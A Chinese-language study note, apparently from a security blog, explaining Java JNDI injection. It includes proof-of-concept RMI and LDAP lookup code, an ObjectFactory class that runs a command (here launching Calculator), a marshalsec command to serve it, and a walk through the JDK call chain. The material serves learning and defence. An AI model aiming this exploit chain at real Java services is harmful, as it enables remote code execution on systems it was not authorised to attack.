@Author: Patrilic @Time: 2020-3-15 16:41:55
JNDI(Java Naming and Directory Interface)
是Java提供的Java 命名和目录接口。
JNDI是一个API,允许客户端通过name发现和查找数据和对象。
// JndiName String jndiName= ...; // Initial Context context = new InitialContext(); // lookup该name的数据 DataSource ds = (DataSourse)context.lookup(jndiName);
JNDI注入就是如果我们可以任意控制 jndiName
的值,那么就可以通过加载JNDI,远程执行Class
RMI的工厂类: com.sun.jndi.rmi.registry.RegistryContextFactory
poc.java
package com.patrilic.jndipoc; import javax.naming.Context; import javax.naming.InitialContext; public class poc { public static void main(String[] args) throws Exception { String uri = "rmi://127.0.0.1:1099/Exploit"; Context ctx = new InitialContext(); ctx.lookup(uri); } }
Exploit.java
import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFactory; import java.io.IOException; import java.util.Hashtable; public class Exploit implements ObjectFactory { @Override public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) { exec("xterm"); return null; } public static String exec(String cmd) { try { Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); } catch (IOException e) { e.printStackTrace(); } return ""; } public static void main(String[] args) { exec("123"); } }
利用 marshalsec
起一个rmiServer
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8001//#Exploit
调用链
javax/naming/InitialContext.java
com/sun/jndi/toolkit/url/GenericURLContext.class
com/sun/jndi/rmi/registry/RegistryContext.class
与registry通讯,获取RMI服务的IP。
直接进入到 help.loadClass()
LDAP工厂类: com.sun.jndi.ldap.LdapCtxFactory
poc.java
package com.patrilic.jndipoc; import javax.naming.Context; import javax.naming.InitialContext; public class poc { public static void main(String[] args) throws Exception { String uri = "ldap://127.0.0.1:1389/Exploit"; Context ctx = new InitialContext(); ctx.lookup(uri); } }
首先同样通过 javax/naming/InitialContext.java#lookup
ldap在 com/sun/jndi/url/ldap/ldapURLContext.class
中进行处理
com/sun/jndi/toolkit/url/GenericURLContext.class
com/sun/jndi/ldap/LdapCtx.class
最后覆盖类执行命令
javax/naming/spi/DirectoryManager.jave